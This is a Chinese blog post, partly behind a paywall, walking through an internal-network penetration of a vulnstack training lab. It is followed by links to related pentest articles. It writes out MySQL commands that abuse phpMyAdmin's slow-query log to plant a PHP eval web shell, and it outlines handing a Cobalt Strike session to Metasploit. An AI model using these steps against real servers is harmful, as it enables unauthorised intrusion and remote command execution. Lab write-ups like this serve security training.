内网渗透之小试牛刀

最新推荐文章于 2022-11-12 18:45:10 发布
原创 最新推荐文章于 2022-11-12 18:45:10 发布 · 2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了内网渗透的过程,包括思路、获取权限、准备工作、内网搜集、横向渗透和拿下域控等步骤。通过判断系统、收集端口和目录信息,发现了PHPMyAdmin的弱口令,利用慢查询日志获取shell。接着使用CS与MSF配合进行提权,并进行内网信息收集,最终通过多种方法如令牌假冒、PTH攻击等成功拿下域控。

内网渗透之小试牛刀

  • 离你最近的地方,路途最远。

文章目录

思路:

获取服务器权限->进入内网->判断是否在域中->信息收集(定位域控、域主机、域用户账号密码等)->横向移动(漏洞利用)->拿下域控。

获取权限:

靶场为http://vulnstack.qiyuanxuetang.net/vuln
直接开搞,首先判断yxcms,然后根据版本尝试一些漏洞无果,进而收集端口以及目录,发现phpmyadmin,弱口令进入
在这里插入图片描述通过慢查询日志getshell

show variables like '%slow%'; 
set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'c:/phpstudy/www/1.php';
select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);

在这里插入图片描述 即可获取shell:
在这里插入图片描述

准备工作:

由于菜刀不好用,直接反弹cs,
在这里插入图片描述然后将cs传给msf,首先msf利用exploit/multi/handler监听,然后cs中把msf监听地址以及端口添加到listen并使用forgein进行监听,然后cs中spawn即可。
在这里插入图片描述

内网搜集:

一切就绪,就可以开始信息收集了,首先判断是否在域中,通过ipconfig /all,即可简单判断在域中。

最低0.47元/天 解锁文章
内网渗透之PPT票据传递攻击(Pass the Ticket)
qq_53742230的博客
07-31 2225
内网渗透之票据传递攻击
内网渗透内网渗透学习之域渗透常规方法
TT小子的博客
07-10 2017
Access Token : 保存了当前用户的权限信息,每个进程可能使用不同用户的身份启动,有不同的Access Token。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。之前版本的操作系统中。在使用net use 命令与远程目标机器建立ipc$后,可以未使用tasklist命令的/S参数列出远程主机上运行的进程。在使用net use 命令与远程目标机器建立ipc$后,可以使用dir 命令列出远程主机中的文件。
牛刀小试】——浅析SQL注入
Jack 架构师之路
03-12 1544
引言   SQL注入在当前编程中是非常重要的话题,在较大的Web项目中程序员都在编程的过程中避免SQL的注入,因为有很多网站信息的泄露都是因为恶意的SQL注入造成的,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.所以我们应该对SQL注入有一定的了解并且在编程的过程中有意去避免它。       SQL注入实例  首先
小试牛刀(一)
风轻云淡
09-17 1523
1、有10张饼,每天至少吃一张,问第三天吃完的概率(36/512) 思路:这里的三天吃完,是指恰巧第三天吃完;那么第一天最多吃8张,剩下两天对应的只有1种情况,第一天吃7张,剩下两天对应的有2种情况,第一天吃6张,剩下两天对应的有3种情况,同理依次类推:1+2+3+4+5+6+7+8=36。 10张饼一共有多少种吃发?可以第1天吃完,可以两天吃完,可以三天吃完......最多十天吃完。 方法...
内网渗透思路
冷风
07-09 2471
内网渗透思路1.      加固,感染系统盘之外的EXE文件保护目标。2.      上键盘记录和USB插件3. 记录目标杀软。4.      抓取HASH。5.  获取目标网络环境,工作组还是域环境。6.  搜索主机是否有网络管理软件5.  搜索主机中所有docxls ppt等关键文件,并下载。6.  对方是否使用outlook,下载PST文件并抓取密码。7.      查看对方是否连接过338
WEB安全渗透课程ppt
01-04
WEB安全渗透课程ppt,cisp-pte教材,包含16个章节,涵盖日常常用漏洞解析
精选资源
内网渗透体系建设.pdf
最新发布
12-31
内网渗透体系是一门复杂的技术学科,它涉及计算机网络、操作系统、数据库和网络安全等多个领域的知识。内网渗透的目的是为了测试和评估一个组织内网的安全性,以防止未授权的访问和数据泄露。内网渗透体系建设主要...
精选资源
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
精选资源
[ 内网渗透 ] 域渗透技术实战指南(域渗透一条龙).rar
02-11
[ 内网渗透 ] 域渗透技术实战指南(域渗透一条龙)
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南
wce内网渗透
03-23
用于内网渗透 抓去密码 抓到管理密码 打开内网 突破
这是一个关于内网渗透的文档
09-14
这个是属于empire内网渗透的这么一篇文档,里面感觉还不错。挺干的吧,适合小白
内网渗透讲义(1).pdf
06-30
渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透
内网渗透测试技术
09-13
内网渗透技术,请勿用于非法目的,仅用于技术交流。
内网渗透常用手法.doc
07-18
内网渗透常用手法
内网渗透
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-12 1272
渗透测试到达渗透阶段时,我们拿到了位于公网主机的权限时,并且能通过挂代理访问到处于内网的主机时。这时如果我们想要拿到内网主机的权限,那么我们就要开始进行内网渗透了。那么,内网渗透该如何开始呢?
ARP攻击与防护--小试牛刀
BIGmustang的博客
05-25 1585
大家好,作为网络人我们都知ARP协议是存在BUG的,下面我们来模拟实验攻击一番。 我们提前装备好2台虚拟机,一台win7 , IP配192.168.10.10 ,win7上运行长角牛软件,一台win10 ,IP配置192.168.10.20 。然后用ESPN模拟软件,还有咱们的 长角牛 攻击软件,然后开始行动。 在参数配置完成后,我们进行路由器的IP设置,检查联通性,具体如图所示 网关的mAC地址如下图所示 检查完毕,我们网络配置正常,下面我们在一台虚拟机上开启长角牛攻击软件 点击开始之后
互联网周刊_11年第15期(115网盘下载)
kmccbb的专栏
08-08 272
简介:去年,团购网站经历了横空出世、跑马圈地的拓展竞速过程;今年,团购网站血拼广告的同时,也在寻求新的出路,突破瓶颈。但如果大多数团购网站依旧亏本做生意,那么资金链吃紧,成本居高不下,将让团购网站进入新一轮...     网盘下载地址:  http://u.115.com/
某教程学习笔记(一):22、内网渗透
Web安全工具库
03-17 488
今天我想你了,但是这并不影响我打游戏不影响我睡觉,我只是偷偷抹了抹眼泪,感叹下最后还是没能牵住你的手。。。 ---- 网易热评 一、信息收集 主机内部收集 1、ip:ipconfig/all 2、进程收集:tasklist 3、端口:netstat -an 4、服务:services.msc 5、软件安装:查看默认安装目录 6、文件目录:查看系统的一些文件或目录 7、共享缓存:\1 会出来...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值